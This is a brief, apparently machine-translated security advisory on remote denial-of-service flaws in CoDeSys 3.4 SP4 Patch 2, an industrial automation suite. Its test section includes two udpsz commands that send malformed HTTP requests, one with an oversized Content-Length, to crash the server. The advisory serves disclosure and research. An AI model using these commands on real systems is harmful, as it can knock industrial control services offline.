Release date: 2011-11-30
Updated on: 2011-12-05
Affected Systems:
3 S GmbH CoDeSys 3.4 SP4 Patch 2
Description:
--------------------------------------------------------------------------------
Bugtraq id: 50854
CoDeSys Automation Suite is an integrated software tool for industrial Automation technology.
Multiple Remote Denial-of-Service vulnerabilities exist in CoDeSys. Remote attackers can exploit this vulnerability to crash applications and DOS legitimate users.
<* Source: Luigi Auriemma (aluigi@pivx.com)
Link: http://aluigi.altervista.org/adv/codesys_1-adv.txt
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Udpsz-T-c "POST/HTTP/1.0 \ r \ nContent-Length: 4294967295 \ r \ n" SERVER 8080-1
Udpsz-T-c "BLAH/HTTP/1.0 \ r \ n" SERVER 8080-1
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
3 S
--
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.3s-software.com/index.shtml? En_CoDeSysV3_en